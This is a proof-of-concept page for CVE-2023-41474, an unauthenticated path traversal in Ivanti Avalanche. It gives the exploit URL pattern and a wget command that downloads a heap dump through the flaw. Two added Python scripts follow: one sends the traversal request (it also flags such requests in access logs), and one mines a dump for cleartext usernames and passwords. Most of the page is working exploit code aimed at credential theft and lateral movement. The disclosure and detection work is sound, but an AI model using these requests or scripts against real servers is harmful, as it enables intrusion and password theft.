
CVE-2023-41474 PoC — Ivanti Avalanche security vulnerability

Associated Vulnerability
Title: Ivanti Avalanche security vulnerability (CVE-2023-41474)
Description: Directory Traversal vulnerability in Ivanti Avalanche 6.3.4.153 allows a remote authenticated attacker to obtain sensitive information via the javax.faces.resource component.
Description
Public disclosure of Ivanti's Avalanche Path Traversal vulnerability
Readme
# IVANTI AVALANCHE - PATH TRAVERSAL

A new vulnerability has been found in Ivanti Avalanche. It was tested on Avalanche Server `v6.3.4.153` and is identified as CVE-2023-41474.

It is a limited unauthenticated path traversal, meaning that an unauthenticated attacker can read files under
`C:\PROGRAM DATA\Wavelink\AVALANCHE\Web\webapps\AvalancheWeb` in a default configuration. Only files with certain extensions
are served, such as `.xml` or `.html` (there are others, and which ones are served also depends on the `.htaccess` rules).
Note that the vulnerability description above lists a remote authenticated attacker, whereas this PoC reports that no authentication is required.

To exploit this issue, an attacker can use the following URL:

`<domain>/AvalancheWeb//faces/javax.faces.resource/<file>?loc=<directory>`

As an example, the attacker can read the `web.xml` file under the `WEB-INF` directory. The request can be modified to access any file in any subdirectory.
To reproduce the attack, any HTTP client such as wget or curl can be used with basic arguments.
The following Burp Suite screenshots show a successful exploitation.

![Request](images/Picture1.png)
![Continuation of the response](images/Picture2.png)
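The request shape above, as an added reproduction and detection helper that is not part of the original PoC repository. The URL prefix is the one the README gives; the host name, the `loc` value used to reach `WEB-INF`, the success heuristic and the access-log lines are assumptions or constructed for illustration. It goes slightly beyond the README by also matching the same request pattern in Tomcat-style access logs, which is what a defender would hunt for.

```python
"""Reproduction and detection helper for the Avalanche JSF resource path
traversal described above (CVE-2023-41474).

This is an added example and not code from the PoC repository. The URL
shape (/AvalancheWeb//faces/javax.faces.resource/<file>?loc=<dir>) is the
one given in the README; the host name, the loc value used for WEB-INF,
the success heuristic and the access-log lines below are assumptions or
constructed for illustration.
"""
import re
import ssl
import sys
import urllib.error
import urllib.request
from urllib.parse import parse_qs, quote, unquote, urlencode

# Path prefix from the README (the doubled slash is kept as published).
RESOURCE_PATH = "/AvalancheWeb//faces/javax.faces.resource/"


def build_traversal_url(base: str, filename: str, loc: str) -> str:
    """Build the request URL for ``filename`` relative to the directory in
    ``loc``.  ``/`` is left unencoded in ``loc`` so the traversal sequence
    reaches the server as written; the file name itself is URL-encoded."""
    return f"{base.rstrip('/')}{RESOURCE_PATH}{quote(filename)}?{urlencode({'loc': loc}, safe='/')}"


def looks_like_web_xml(body: bytes) -> bool:
    """Heuristic success check: a real deployment descriptor, not a JSF
    error page or an empty 200."""
    return b"<web-app" in body and b"</web-app>" in body


def fetch(url: str, verify_tls: bool = False, timeout: float = 10.0) -> tuple[int, bytes]:
    """GET ``url`` and return (status, body).  TLS verification is off by
    default for the same reason the README's wget line uses
    --no-check-certificate: lab targets usually have self-signed certs."""
    ctx = ssl.create_default_context()
    if not verify_tls:
        ctx.check_hostname = False
        ctx.verify_mode = ssl.CERT_NONE
    req = urllib.request.Request(url, headers={"User-Agent": "cve-2023-41474-check"})
    try:
        with urllib.request.urlopen(req, timeout=timeout, context=ctx) as resp:
            return resp.status, resp.read()
    except urllib.error.HTTPError as err:
        return err.code, err.read()


# Constructed Tomcat-style access-log lines (not from the page): one benign
# JSF resource request and two traversal attempts, one percent-encoded.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Oct/2023:10:00:01 +0000] "GET /AvalancheWeb/faces/javax.faces.resource/jsf.js?ln=javax.faces HTTP/1.1" 200 12345
10.0.0.9 - - [01/Oct/2023:10:00:02 +0000] "GET /AvalancheWeb//faces/javax.faces.resource/web.xml?loc=../WEB-INF HTTP/1.1" 200 4412
10.0.0.9 - - [01/Oct/2023:10:00:03 +0000] "GET /AvalancheWeb//faces/javax.faces.resource/dump.hprof?loc=..%2F HTTP/1.1" 200 534221
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})'
)


def flag_traversal_requests(log_text: str) -> list[str]:
    """Return "<ip> <target>" for every javax.faces.resource request whose
    ``loc`` parameter carries a ``..`` sequence, raw or percent-encoded
    (parse_qs decodes once; the extra unquote also catches double encoding)."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m or "javax.faces.resource/" not in m.group("target"):
            continue
        query = m.group("target").partition("?")[2]
        loc_values = parse_qs(query, keep_blank_values=True).get("loc", [])
        if any(".." in unquote(v) for v in loc_values):
            hits.append(f"{m.group('ip')} {m.group('target')}")
    return hits


if __name__ == "__main__":
    # Offline by default; pass a base URL such as https://avalanche.example to send the request.
    base = sys.argv[1] if len(sys.argv) > 1 else "https://avalanche.example"
    url = build_traversal_url(base, "web.xml", "../WEB-INF")  # loc value for WEB-INF is assumed
    print("request:", url)
    if len(sys.argv) > 1:
        status, body = fetch(url)
        print("status:", status, "web.xml retrieved:", looks_like_web_xml(body))
    for hit in flag_traversal_requests(SAMPLE_LOG):
        print("suspicious:", hit)
```

Run it without arguments to see the built URL and the two flagged log lines; pass a base URL to actually send the request. The detector keys on `loc` specifically because a plain `..` match on the whole request line would also fire on legitimate relative resource names.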

# Increasing the impact

In a real scenario, an unauthenticated attacker can read configuration settings and other internal information, which on its own is a low confidentiality impact.
However, in some scenarios this directory contains files that can be used for session hijacking and a complete compromise of the server.
If the attacker has administrative privileges (or an administrator has performed this step previously), a heap dump of the Avalanche process
can be triggered (this functionality exists for debugging purposes). It can be found at
`Tools > Support and Licensing > Web Application Server > “Heap Dump” and/or “Thread Dump”`.

![Thread dump](images/Picture3.png)

A successful response from the server includes the path where the process dump is stored.

![Thread dump](images/Picture4.png)

Since the file is stored at `C:\Program Files\Wavelink\Avalanche\Web\webapps\AvalancheWeb\dump.hprof`, inside the web application directory, it is reachable through the path traversal.
The attacker can then download the dump file and analyse it:

`wget --no-check-certificate '<domain>/AvalancheWeb//faces/javax.faces.resource/dump.hprof?loc=../'`

With some basic string searches over the dump, it is possible to find login request bodies still resident in memory.

![Thread dump](images/Picture5.png)

Within those bodies, usernames and passwords are exposed to the attacker, who can use them to elevate privileges or move laterally
within the environment.
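The string-search step above, as an added example that is not part of the original PoC repository. Avalanche's actual login body format is not shown on this page, so the form-encoded and JSON shapes searched for, the field names, and the sample dump bytes are assumptions or constructed for illustration; the approach is the same one a practitioner would run over a real `dump.hprof`.

```python
"""Search a heap dump for login request bodies still held in memory, the
"basic string search" step described above.

Added example, not code from the PoC repository.  Avalanche's real login
body format is not shown on this page, so the form-encoded and JSON shapes
searched for here, the field names, and the sample dump bytes are assumed
or constructed for illustration.
"""
import json
import mmap
import re
import sys
from typing import Optional
from urllib.parse import parse_qs

# Constructed stand-in for a slice of dump.hprof: an HPROF-like header,
# binary noise, and two login bodies (form-encoded, then JSON).
SAMPLE_DUMP = (
    b"\x00JAVA PROFILE 1.0.2\x00" + b"\xff" * 32
    + b"username=admin&password=Summ3r%212023&rememberMe=on"
    + b"\x00" * 16
    + b'{"username":"svc_backup","password":"B4ckup!Pass"}'
    + b"\x00" * 8
)

# A form body is two or more key=value pairs joined by '&', terminated by a
# byte that cannot belong to a body (NUL, whitespace).
FORM_BODY_RE = re.compile(rb"[\w%+.-]+=[^\s\x00&]*(?:&[\w%+.-]+=[^\s\x00&]*)+")
# A flat JSON object that names a password field; nested objects are skipped.
JSON_BODY_RE = re.compile(rb'\{[^{}\x00]*"(?:password|passwd|pass|pwd)"[^{}\x00]*\}', re.I)

USER_KEYS = ("username", "user", "login", "email", "j_username")
PASS_KEYS = ("password", "passwd", "pass", "pwd", "j_password")


def _first(fields: dict, keys: tuple) -> Optional[str]:
    for k in keys:
        if k in fields:
            return fields[k]
    return None


def extract_credentials(blob) -> list:
    """Return the credential pairs found in ``blob`` (bytes or an mmap),
    ordered by their offset in the dump."""
    found = []
    for m in FORM_BODY_RE.finditer(blob):
        pairs = parse_qs(m.group(0).decode("latin-1"), keep_blank_values=True)
        fields = {k.lower(): v[0] for k, v in pairs.items()}  # parse_qs already %-decodes
        pw = _first(fields, PASS_KEYS)
        if pw is not None:
            found.append({"format": "form", "offset": m.start(),
                          "username": _first(fields, USER_KEYS), "password": pw})
    for m in JSON_BODY_RE.finditer(blob):
        try:
            obj = json.loads(m.group(0).decode("utf-8", "replace"))
        except json.JSONDecodeError:
            continue
        if not isinstance(obj, dict):
            continue
        fields = {str(k).lower(): str(v) for k, v in obj.items()}
        pw = _first(fields, PASS_KEYS)
        if pw is not None:
            found.append({"format": "json", "offset": m.start(),
                          "username": _first(fields, USER_KEYS), "password": pw})
    found.sort(key=lambda rec: rec["offset"])
    return found


if __name__ == "__main__":
    if len(sys.argv) > 1:
        # Real dumps are large; map the file instead of reading it into memory.
        with open(sys.argv[1], "rb") as fh, mmap.mmap(fh.fileno(), 0, access=mmap.ACCESS_READ) as mm:
            records = extract_credentials(mm)
    else:
        records = extract_credentials(SAMPLE_DUMP)
    for rec in records:
        print(f"{rec['format']:4} @0x{rec['offset']:08x} user={rec['username']!r} password={rec['password']!r}")
```

Run it with no arguments to scan the constructed sample, or with a path to an `.hprof` file to scan a real dump via `mmap`. Because regex scanning of a multi-gigabyte dump is slow, a first pass with `strings` piped into `grep -i password` gives the same leads faster; the script is useful for then decoding the percent-encoded and JSON bodies correctly.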
File Snapshot

[4.0K] /data/pocs/f2c310bae6fdabbd8074a25f46d3f296f774230f
├── [4.0K] images
│   ├── [179K] Picture1.png
│   ├── [ 78K] Picture2.png
│   ├── [ 63K] Picture3.png
│   ├── [109K] Picture4.png
│   └── [185K] Picture5.png
├── [ 11K] LICENSE
└── [2.6K] README.md

1 directory, 7 files